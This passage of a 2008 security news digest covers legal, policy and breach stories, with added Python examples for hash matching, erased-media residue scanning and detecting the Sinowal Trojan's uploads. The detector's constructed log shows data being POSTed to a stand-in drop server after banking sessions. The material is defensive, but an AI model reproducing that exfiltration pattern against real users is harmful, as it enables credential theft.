75 Appeals Court Upholds Decision, Reversing Case That Allowed Business Method Patents (October 30, 2008) The United States Court of Appeals for the Federal Circuit this week ruled nine to three to uphold a lower decision, in a ruling that could reverse the landmark State Street Bank vs. Signature Financial Group case. That case, decided in 1998, found that business methods for computer commerce were patentable, and led to successful applications for patents on Amazon.com's "1-Click" checkout, Priceline.com's "name your own price" and various other tools. http://bits.blogs.nytimes.com/2008/10/30/federal-court-kills-patents-on-business-methods/?pagemode=print http://www.groklaw.net/article.php?story=20081030150903555 http://blogs.wsj.com/law/2008/10/30/court-reverses-position-on-business-methods-patents-in-bilski-case/?mod=googlenews_wsj http://www.groklaw.net/pdf/07-1130.pdf

76 Court Rules Running Hashes Constitutes Fourth Amendment Search (October 29, 2008) A US District Court has ruled that computing hash values of the files on a computer and comparing them against a database of known files constitutes a Fourth Amendment search (meaning a warrant would have been needed for the evidence to be usable in court). The ruling suppresses evidence found by police on Robert Crist's computer. Because Crist had fallen behind on his rent, his landlord hired people to move his belongings to the curb. A friend of the movers picked up his laptop, and when Crist discovered the pile of his property outside, he reported his computer stolen. The movers' friend allegedly found images of child pornography on the machine and called the police, who then ran hashes on the machine's files to determine whether it contained files known to be child pornography. The decision will likely be appealed. http://volokh.com/archives/archive_2008_10_26-2008_11_01.shtml#1225159904 http://arstechnica.com/news.ars/post/20081029-court-rules-hash-analysis-is-a-fourth-amendment-search.html
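What "running hashes" means in practice, as an added example that is not code from the court record or the article: every regular file under a directory is hashed and the digest is looked up in a set of known-file hashes. The known set here is constructed from two made-up byte strings (a real examination uses vetted reference sets), and the example uses SHA-256 where 2008-era sets were typically MD5 or SHA-1. The point the court relied on is visible in the code: the comparison is on file contents, not on file names or locations, so it reads everything on the disk.

```python
import hashlib
import os
import tempfile


def sha256_of(path, chunk_size=1 << 20):
    """Stream the file through SHA-256 so large files do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


# Constructed reference set: digests of two illustrative byte strings.
KNOWN_HASHES = {
    hashlib.sha256(b"known sample A").hexdigest(),
    hashlib.sha256(b"known sample B").hexdigest(),
}


def scan_tree(root, known=KNOWN_HASHES):
    """Hash every regular file below root and return {path: digest} for the
    files whose contents match an entry in the known set.  Symlinks are
    skipped so a link cannot pull in files from outside the tree."""
    hits = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            digest = sha256_of(path)
            if digest in known:
                hits[path] = digest
    return hits


def demo():
    """Build a throwaway tree with one renamed match, one non-match and one
    match in a subdirectory; return the base names of the files that hit."""
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "sub"))
        samples = [
            ("holiday.jpg", b"known sample A"),        # name says nothing; content matches
            ("notes.txt", b"unrelated content"),
            (os.path.join("sub", "c.bin"), b"known sample B"),
        ]
        for rel, data in samples:
            with open(os.path.join(root, rel), "wb") as fh:
                fh.write(data)
        hits = scan_tree(root)
        return sorted(os.path.basename(p) for p in hits)


if __name__ == "__main__":
    print(demo())   # matches found by content, whatever the files are called
```

Because a single changed byte produces a different digest, hash matching finds only exact copies of known files; that is why it is fast and low in false positives, and also why it says nothing about files that are not already in the reference set.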

77 Study Finds Security Policy Adherence Problems (October 28 & 29, 2008) A Cisco-commissioned study found that employees at businesses in 10 countries around the world are often unaware of their companies' security policies, or ignore the policies because they hinder productivity. When surveyed about whether their companies had security policies, there was a 20 to 30 percent gap between responses from IT professionals and other employees. When asked why security policies are violated, IT professionals pointed to ignorance, while other employees said it was because the policies made it more difficult for them to do their jobs. The study surveyed more than 2,000 employees and IT professionals at companies in the US, the UK, France, Germany, Italy, Japan, China, India, Australia and Brazil. http://www.eweek.com/c/a/Security/Cisco-Study-Highlights-Common-Failures-of-Enterprise-Security-Policies/ http://www.computerworld.com.au/index.php/id;1866823251;fp;4;fpid;78268965

78 Tenenbaum Indicted in New York (October 29 & 30, 2008) Ehud Tenenbaum has been indicted in New York on charges of access device fraud and conspiracy to commit access device fraud. The indictment alleges that Tenenbaum "did knowingly and with intent to defraud effect transactions with one or more access devices issued to another person or persons." Last month, Tenenbaum and three accomplices were arrested in Canada for allegedly breaking into computer systems to increase limits on prepaid debit and credit cards and using those cards to withdraw US $1.7 million. In 1998, Tenenbaum broke into unclassified computer systems at the Pentagon in what was then called "the most organized and systematic attack to date" on US defense department computers. http://www.theregister.co.uk/2008/10/30/analyzer_hacker_indictment/ http://blog.wired.com/27bstroke6/2008/10/israeli-hacker.html

79 Cyber Saboteur Gets Six Months in Prison (October 28, 2008) A federal judge has sentenced contract systems administrator Priyavrat Patel to six months in prison for deliberately sabotaging three servers at his former employer's business. Patel will also serve three years of supervised release, the first six months of which will be in home confinement, and pay US $120,000 in restitution. Patel was upset over having been fired from his contract position at Connecticut tool manufacturer Pratt-Read; he removed critical boot-up files from the three servers, forcing the company to fall back on paper records for two weeks while the problem was cleaned up. Patel had accessed the servers from his home in late November 2007. http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9118362&source=rss_topic17 http://newhaven.fbi.gov/dojpressrel/2008/nh102808b.htm

80 ICANN Tells EstDomains its Registrar Accreditation Will be Revoked (October 29 & 30, 2008) The Internet Corporation for Assigned Names and Numbers (ICANN) says that EstDomains' registrar accreditation will be revoked on November 12. EstDomains is a domain name registrar that is known to register shady domains used in the commission of cybercrime. The reason given for the revocation is that company president Vladimir Tsastsin was convicted in an Estonian court on credit card fraud charges. Many domain names registered by EstDomains have been used in spam, phishing, malware spreading and drug sale schemes. US network provider Intercage also ended its contract with EstDomains when it was faced with termination of service from its upstream providers for similar reasons. Update: The revocation has been temporarily stayed while ICANN hears EstDomains' response to the charges against Tsastsin. http://www.theregister.co.uk/2008/10/29/estdomains_gets_deaccredited/ http://www.vnunet.com/vnunet/news/2229394/estdomains-fighting-life http://www.securityfocus.com/brief/847

81 Group Challenges Texas Law Requiring Computer Repair Technicians to Have Private Investigator Licenses (October 31, 2008) The Texas Private Security Board has once again refused to approve a rule that would exempt computer repair technicians from licensing requirements. Presently, anyone in Texas who performs an action on a computer that is deemed an investigation must have a valid, government-issued private investigator's license. The Board tabled a proposal exempting repair technicians from the requirement earlier this year and did so again last week. The law also punishes consumers who have their computers repaired by unlicensed individuals. The law is being challenged under the Texas Constitution by the Institute for Justice Texas Chapter. http://www.ij.org/index.php?option=com_content&task=view&id=2438&Itemid=129

82 French Senate Approves Law That Would Cut Off Pirates' Internet Access (October 31, 2008) The French Senate has approved a "graduated response" law that would cut off Internet access for users who habitually download digital content in violation of copyright law. The law still needs to be approved by the lower house before it can be enacted. First-time violators would receive an email warning. If they continue to download illegally, they will receive a letter in the mail, and continued infractions will result in Internet service being cut off for one year. If enacted, the law would be at odds with a European Parliament amendment that prohibits cutting off Internet service for illegal downloading. http://euobserver.com/9/27026

83 Test Finds Recertified Data Storage Tapes Expose Old Information (October 30, 2008) In a test of 100 erased and recertified data storage tapes conducted by storage media maker Imation, researchers were able to read sensitive bank and hospital information, as well as field research and Human Genome Project data. The test "confirms industry guidance that the only way to properly dispose of data is to destroy the media itself." Other companies that sell data storage technology have conducted similar studies that drew similar conclusions, but a company that sells recertified tapes says that "any data that remains on the tape is not usable/readable." http://www.darkreading.com/security/storage/showArticle.jhtml?articleID=211800370
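The practical check behind this item is to read "erased" media back, front to back, and look for anything that survived, rather than trusting the recertifier's claim. The following is an added example (not code from the original item or from Imation's test) of such a read-back scan: it counts non-zero bytes and reports runs of printable text, carrying the tail of each read into the next so a record that straddles a read boundary is still found at its true offset. The tape image it scans is constructed in memory for the example; the account record in it is made up.

```python
import io
import re

CHUNK_SIZE = 64 * 1024


def _printable_suffix_start(buf):
    """Index where the maximal trailing run of printable ASCII in buf begins."""
    i = len(buf)
    while i > 0 and 0x20 <= buf[i - 1] <= 0x7E:
        i -= 1
    return i


def scan_for_residue(stream, min_run=8, chunk_size=CHUNK_SIZE):
    """Read a medium (or its image) front to back and report what survives.

    Returns {"bytes": total read, "nonzero": count of non-zero bytes,
    "runs": [(offset, bytes), ...]} where runs are printable-ASCII sequences
    of at least min_run bytes. The trailing printable bytes of each chunk are
    carried into the next read, so a run straddling a chunk boundary is
    reported once, at its true offset. (If the whole medium is printable text
    the carry grows without bound; that is itself a finding.)
    """
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_run)
    total = nonzero = 0
    runs = []
    carry = b""
    while True:
        chunk = stream.read(chunk_size)
        if not chunk:
            break
        nonzero += len(chunk) - chunk.count(0)
        buf = carry + chunk
        base = total - len(carry)            # stream offset of buf[0]
        total += len(chunk)
        cut = _printable_suffix_start(buf)   # buf[cut-1] is non-printable, so no run crosses cut
        for m in pattern.finditer(buf, 0, cut):
            runs.append((base + m.start(), m.group()))
        carry = buf[cut:]                    # may still continue in the next chunk
    if len(carry) >= min_run:                # a run that ran up to the end of the medium
        runs.append((total - len(carry), carry))
    return {"bytes": total, "nonzero": nonzero, "runs": runs}


def scan_bytes(data, **kwargs):
    """Convenience wrapper for scanning an in-memory image."""
    return scan_for_residue(io.BytesIO(data), **kwargs)


def is_clean(result):
    """True only if nothing at all was read back from the medium."""
    return result["nonzero"] == 0 and not result["runs"]


def demo():
    """Constructed 'erased' tape image: all zeros except one surviving record
    placed across the first chunk boundary and a fragment too short to report."""
    record = b"ACCT=0000123456;NAME=J DOE;BAL=1,234.56"   # constructed, not real data
    image = bytearray(3 * CHUNK_SIZE)
    start = CHUNK_SIZE - 10                                # straddles chunk 1 / chunk 2
    image[start:start + len(record)] = record
    image[2 * CHUNK_SIZE + 100:2 * CHUNK_SIZE + 103] = b"abc"
    return scan_bytes(bytes(image)), start, record


if __name__ == "__main__":
    result, _, _ = demo()
    print("clean" if is_clean(result) else f"residue: {result['runs']}")
```

A zero-byte count of exactly zero across the whole medium is the only result that should pass; any printable run is evidence that the "erase" was a directory or header rewrite rather than an overwrite, which is the condition the Imation test found.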

84 US Defense Department Takes Cyber Security Seriously (October 30, 2008) Speaking at the National Homeland Defense Foundation's Cyber Threats Symposium, Rear Admiral Jan Hamby says that cyber security has become a priority in the US military ever since the 2005 Titan Rain attacks on military systems. The Defense Department's Joint Task Force Global Network Operations (JTF-GNO) has stepped forward as a model in cyber security best practices, including banning YouTube, MySpace and other such sites from military computers. JTF-GNO has also taken a hard line on patch management on military computer systems. http://mail.google.com/mail/?shva=1#inbox/11d6494cdc0443b4

85 Trojan Responsible for Theft of Half a Million Records of Financial Account Data (October 31, 2008) Researchers have uncovered a trove of financial account data stolen by a Trojan horse program known as Sinowal over the last several years. As many as half a million accounts have been compromised; more than 20 percent were stolen in the last six months alone. Sinowal, which is also known as Torpig and Mebroot, spreads from websites onto unpatched PCs as a drive-by download, without any user interaction. That the Trojan had been operating for nearly three years has been called "extraordinary." It lies in wait on infected PCs; when a user enters a banking URL, it presents a phony page to collect the pertinent data and then sends the information to a drop server. http://www.theregister.co.uk/2008/10/31/sinowal_trojan_heist/ http://www.theregister.co.uk/2008/10/31/torpig_banking_trojan/ http://news.bbc.co.uk/2/hi/technology/7701227.stm http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9118718&intsrc=hm_list
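The behaviour described (a banking session followed by a POST of harvested data to a drop server the user never typed in) leaves a pattern in outbound proxy logs. The following is an added example (not code from the original item or from the researchers who analysed Sinowal) of a detection that looks for exactly that pattern: a POST from a client to a host outside the known banking domains within a short window after that client visited a banking page, and then the aggregation that surfaces drop hosts shared by several infected clients. The log format, the banking domain list and all log lines are constructed for the example.

```python
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed allowlist of the organisation's online-banking hosts (assumption
# for this example; a real deployment maintains this list deliberately).
BANK_DOMAINS = ("examplebank.test",)
WINDOW_SECONDS = 120   # how long after a banking page a stray POST is treated as suspicious

# Constructed proxy log lines: epoch_seconds client method url status bytes
SAMPLE_LOG = """\
1225454400.100 10.0.0.5 GET https://online.examplebank.test/login 200 5120
1225454401.300 10.0.0.5 GET https://online.examplebank.test/static/app.js 200 88120
1225454409.900 10.0.0.5 POST https://203.0.113.7/gate.php 200 312
1225454500.000 10.0.0.9 GET https://online.examplebank.test/login 200 5120
1225454503.200 10.0.0.9 POST https://online.examplebank.test/auth 302 0
1225454700.000 10.0.0.9 POST https://cdn.example.test/analytics 204 0
1225455000.000 10.0.0.12 GET https://online.examplebank.test/login 200 5120
1225455004.400 10.0.0.12 POST https://203.0.113.7/gate.php 200 298
"""


def parse_line(line):
    """Split one constructed log line into a record with a normalised host."""
    ts, client, method, url, status, size = line.split()
    parts = urlsplit(url)
    return {
        "ts": float(ts),
        "client": client,
        "method": method.upper(),
        "host": (parts.hostname or "").lower(),
        "path": parts.path,
        "status": int(status),
        "bytes": int(size),
    }


def is_bank_host(host):
    """Exact or subdomain match against the banking allowlist (no suffix tricks)."""
    return any(host == d or host.endswith("." + d) for d in BANK_DOMAINS)


def detect(lines, window=WINDOW_SECONDS):
    """Flag POSTs to non-bank hosts shortly after a client touched a bank host."""
    last_bank = {}   # client -> timestamp of its most recent banking request
    alerts = []
    for raw in lines:
        raw = raw.strip()
        if not raw or raw.startswith("#"):
            continue
        rec = parse_line(raw)
        if is_bank_host(rec["host"]):
            last_bank[rec["client"]] = rec["ts"]   # legitimate bank traffic, including its own POSTs
            continue
        if rec["method"] != "POST":
            continue
        t0 = last_bank.get(rec["client"])
        if t0 is not None and 0 <= rec["ts"] - t0 <= window:
            alerts.append({
                "client": rec["client"],
                "host": rec["host"],
                "path": rec["path"],
                "seconds_after_bank": round(rec["ts"] - t0, 1),
                "bytes": rec["bytes"],
            })
    return alerts


def shared_drop_hosts(alerts, min_clients=2):
    """Hosts that received post-banking POSTs from several distinct clients."""
    by_host = defaultdict(set)
    for a in alerts:
        by_host[a["host"]].add(a["client"])
    return sorted(h for h, clients in by_host.items() if len(clients) >= min_clients)


if __name__ == "__main__":
    found = detect(SAMPLE_LOG.splitlines())
    for a in found:
        print(f"{a['client']} -> {a['host']}{a['path']} {a['seconds_after_bank']}s after banking")
    print("shared drop hosts:", shared_drop_hosts(found))
```

Two caveats apply: the Trojan's own upload to the drop server need not go through the browser's proxy at all, so absence of a hit proves nothing, and a POST to a third-party host (analytics, CDN) inside the window is a false positive until the destination is checked, which is why the per-host aggregation across clients is the more useful output.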

86 US State Department Warns of Passport Application Data Theft (October 31, 2008) The US State Department has notified 383 people that their personal information supplied when applying for a passport may have been compromised. A man arrested earlier this year was found to have credit cards in nearly 20 different names; several passport applications in his possession matched the names on some of the cards. The information from the applications was allegedly used to open the fraudulent credit card accounts. The suspect told authorities at the time that he had two accomplices, one at the State Department and the other at the US Postal Service. http://www.msnbc.msn.com/id/27475651/ http://www.washingtonpost.com/wp-dyn/content/article/2008/10/30/AR2008103004716_pf.html
